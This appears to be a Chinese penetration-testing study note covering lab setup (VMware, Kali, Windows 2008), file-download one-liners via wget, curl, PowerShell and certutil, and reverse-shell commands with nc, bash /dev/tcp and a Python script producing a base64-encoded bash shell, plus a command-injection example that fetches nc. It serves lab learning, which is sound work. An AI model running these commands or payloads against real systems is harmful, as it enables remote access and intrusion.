下载文章

方法一:下载谷歌插件fireshot,捕捉整个页面

方法二:使用js代码

  • f12进入控制台,粘贴如下代码
(function(){
$("#side").remove();
$("#comment_title, #comment_list, #comment_bar, #comment_form, .announce, #ad_cen, #ad_bot").remove();
$(".nav_top_2011, #header, #navigator").remove();
$(".p4course_target, .comment-box, .recommend-box, #csdn-toolbar, #tool-box").remove();
$("aside").remove();
$(".tool-box").remove();
$("#toolBarBox").remove();
$("main").css('display','content');
$("main").css('float','left');
$(".option-box").remove();
$("body").css('min-width',0);
$(".option-box").remove();
window.print();
})();
  • 如下图所示

  • 另存为pdf即可

参考链接:https://blog.csdn.net/weixin_44928129/article/details/122569120

虚拟机配置

  • 安装好vmware之后,在首选项进行如下修改

  • 创建新的虚拟机的时候,一直点下一步,创建磁盘容量的时候,选择单个文件

  • win10的镜像可以去官网下载:https://www.microsoft.com/zh-cn/software-download/windows10/,这里是详细教程https://blog.csdn.net/Jackliu200911/article/details/116548055

  注意这两步:

  

  • ubuntu20.04安装教程:https://blog.csdn.net/weixin_41805734/article/details/120698714
  • win2k8
    • 开启3389端口,远程桌面:reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul
    • 关闭防火墙
    • 在物理机win+r,输入mstsc,进行连接
  • kali官网https://www.kali.org/
  • kali的汉化
    • ctrl+alt+t,打开终端,在终端中执行dpkg-reconfigure locales
    • en_US.UTF-8 UTF-8改为不勾选,按下空格

    • 勾选zh-CN.UTF-8 UTF-8,按下回车选择第三个。若有zh_CN.GBK GBK也一起勾选上,没有就不用。

    • 重启之后,会有个提示,选择保留旧名称
  • kali开启ssh服务
    • sudo vi /etc/ssh/sshd_config
    • # PasswordAuthentication yes的“#”去掉
    • 修改PermitrootLogin prohibit-passwordPermitRootLogin yes

    • sudo service ssh restart,重启ssh服务。sudo service ssh status,查看ssh服务

渗透测试常用命令

查找文件find / -name flag ,*代表模糊查找(bash)
ps-ef | grep apt

  常用的命令:https://blog.csdn.net/weixin_43303273/article/details/83029138

  Linux:https://blog.csdn.net/liangpingguo/article/details/79140780

  cmd:https://www.cnblogs.com/air-of-code/p/6015590.html

  powershell:
        https://www.anquanke.com/post/id/87976
        https://www.anquanke.com/post/id/88851
        https://www.anquanke.com/post/id/89362

渗透测试常用名词

POC:概念验证,常指漏洞证明的代码,无害
EXP:利用,指利用系统漏洞进行攻击,每个漏洞都有其 独有 的exp,有害
Payload:有效载荷,成功exploit之后,真正再在标系统执行的代码或者指令,可用于 多个 漏洞

 参考链接:

  渗透测试专业术语:https://www.cnblogs.com/sunny11/p/13583083.html
  ATT&CK:https://attack.mitre.org/

文件下载

对于文件下载和反弹shell的命令,棱角社区能够自动生成:

棱角社区:https://forum.ywhack.com/bountytips.php?download

  • python启用临时web服务
python3 -m http.server -d / 8888
python2 -m simpleHTTPServer -d / 8888
//-d指定启用web服务的路径,python在/下启动临时的http服务,使用wget下载会下载/下的,默认路径是/root
  • Linux文件下载
wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
  • powershell文件下载
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"
  • cmd文件下载
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
copy \\127.0.0.1\files\ms10-051.exe exploit.exe

  其他不一一列举,可以在棱角社区进行查询。

防火墙

  防火墙有出站规则和入站规则,相较而言,出站规则比入站规则宽松很多。讲的通俗点,自己想出去限制少,别人想进来限制多。

反弹shell

ncat:

victim:
nc -e /bin/bash ip port //linux
nc -e cmd ip port //windows listener:
nc -lvvnp port

bash:

victim:
bash -i >& /dev/tcp/ip/port 0>&1
sh -i >& /dev/tcp/ip/port 0>&1 listener:
nc -lvvnp port

python:

#!/usr/bin/env python
# coding=utf-8
import argparse,base64 def main():
parser = argparse.ArgumentParser(description="")
parser.add_argument('-i','--ip',help='回连IP',default="127.0.0.1")
parser.add_argument('-p','--port',help='回连端口',default="3456")
args = parser.parse_args()
print(args)
ip = args.ip
port = args.port
cmd = "bash -i >/dev/tcp/"+ip+"/"+port+" 0>&1"
encoder = base64.b64encode(cmd.encode("utf-8"))
try:
print("bash -c {echo,"+encoder.decode("utf-8")+"}|{base64,-d}|{bash,-i}")
except :
print("可以使用-h参数查看帮助信息") if __name__ == '__main__':
main()
  • kali用bash弹shell,会报错zsh: 没有那个文件或目录: /dev/tcp/ip/port

    • 解决办法:sudo vi /etc/passwd,将zsh改成bash

   kali作为攻击机:172.168.10.128

   win2k8作为靶机:172.16.10.130

  • !!!靶机能够成功ping通kali,kali也能成功ping通靶机

  • 在kali上开启临时的http服务,win2k8下载kali的/root/pentest目录下的nc.exe,并且重命名为a.exe。如果不开启http服务,失败结果如下一张图。为了方便实验,将a.exe改回nc.exe

  • 正向连接

    • 情况一:防火墙开启,win2k8出站

    • 情况二:防火墙开启,kali入站,无法成功反弹shell

    • 情况三:防火墙关闭,kali入站,成功反弹shell

  • 反向连接

    • 为什么要反向连接?

      • 目标在局域网内,攻击机无法ping通目标
      • 端口占用
      • 由于防火墙等限制,目标主机只能发送请求,不能接收请求
      • ip动态改变
  • 进行网络上的修改,取消勾选箭头所示

  • win2k8靶机:172.16.10.130,物理机:192.168.0.183。内网可以访问外网,外网访问不了内网

  • 防火墙开启,无法访问内网的情况下,能成功反弹shell

思路

  • 如果有RCE,可以尝试绕过。如127.0.0.1 & wget http://ip:port/example.exe,帮目标机下载安装nc,再用ncat进行反弹
  • 直接用bash进行反弹shell

0x00.常用名词、文件下载、反弹shell的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第一天 - 操作系统&名词&文件下载&反弹SHELL&防火墙绕过

    一.专业名词 1.POC:(Proof of Concept),即概念验证.漏洞报告中的POC是一段说明或一个攻击的样例使读者能够确认这个漏洞是真实存在的. 2.EXP:exploit,即漏洞利用.对 ...

  2. 常用的一句话反弹shell总结

    文章转载来源:https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F% ...

  3. linux 常用反弹shell小记

    在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell. 1.bash反弹shell 本地开启监听 nc -lvvp 受害主机命令 bash ...

  4. Linux渗透之反弹Shell

    前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的.在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个 ...

  5. Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在 ...

  6. linux 反弹shell

    Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点. nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或 ...

  7. 渗透测试中Linux下反弹shell的认识

    最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧. 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反 ...

  8. [Shell]多姿势反弹shell

    客户端监听本地: nc -nvlp 4444 从原生的 shell 环境切换到 linux 的交互式 bash 环境: python -c 'import pty; pty.spawn("/ ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

  10. Linux 反弹shell(二)反弹shell的本质

    Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向 ...

随机推荐

  1. XSS--labs通关记录

    XSS--labs通关记录 level 1(无过滤) 查看网页源代码 <!DOCTYPE html><!--STATUS OK--><html> <head& ...

  2. C#中多线程的用法

    1.在C#中使用多线程可以使用Thread 代码例子: public class ThreadExample { public static void ThreadProc() { for (int ...

  3. C#程序随系统启动例子 - 开源研究系列文章

    今天讲讲C#中应用程序随系统启动的例子. 我们知道,应用程序随系统启动,都是直接在操作系统注册表中写入程序的启动参数,这样操作系统在启动的时候就根据启动参数来启动应用程序,而我们要做的就是将程序启动参 ...

  4. 【JMeter】常用线程组设置策略

    常用线程组设置策略 目录 常用线程组设置策略 一.前言 二.单场景基准测试 1.介绍 2.线程组设计 3.测试结果 三.单场景并发测试 1.介绍 2.线程组设计 3.测试结果 四.单场景容量/爬坡测试 ...

  5. 实在智能TARS-RPA-Agent,业界首发的产品级大模型Agent有何非凡之处?

    融合LLM的RPA进化到什么程度? AIGC如何借AI Agent落地? 像生成文本一样生成流程的ChatRPA,能够提升RPA新体验? 边探索边创建的ChatRPA,能否破解RPA与LLM融合难题? ...

  6. Mysql高阶自定义排序

    Mysql高阶自定义排序 嗨,大家好,我是远码,隔三岔五给大家分享一点工作的技术总结,花费的时间不多,几分钟就行,谢谢! Mysql对我们码农来说是在熟悉不过的日常了,就不在介绍它的基础用法了,今天我 ...

  7. 发布策略:蓝绿部署、金丝雀发布(灰度发布)、AB测试、滚动发布、红黑部署的概念与区别

    蓝绿发布(Blue-Green Deployment) 蓝绿发布提供了一种零宕机的部署方式.不停老版本,部署新版本进行测试,确认OK,将流量切到新版本,然后老版本同时也升级到新版本.始终有两个版本同时 ...

  8. Spring Bean 的作用域(Bean Scope)

    前言 大家好,我是 god23bin,今天我们来聊一聊 Spring 框架中的 Bean 作用域(Scope). 什么是 Bean 的作用域? 我们在以 XML 作为配置元数据的情况下,进行 Bean ...

  9. Ds100p -「数据结构百题」11~20

    11.P3203 [HNOI2010]弹飞绵羊 某天,\(Lostmonkey\) 发明了一种超级弹力装置,为了在他的绵羊朋友面前显摆,他邀请小绵羊一起玩个游戏. 游戏一开始,\(Lostmonkey ...

  10. Mysql忘记密码后如何重置密码

    长时间不使用本机的Mysql后把密码忘记了咋整?直接上干货: 第一步(Mysql部署的位置,若自己能找到就忽略这一步):任务管理器中也可以找到 第二步:修改配置文件 在my.ini末尾加上 skip- ...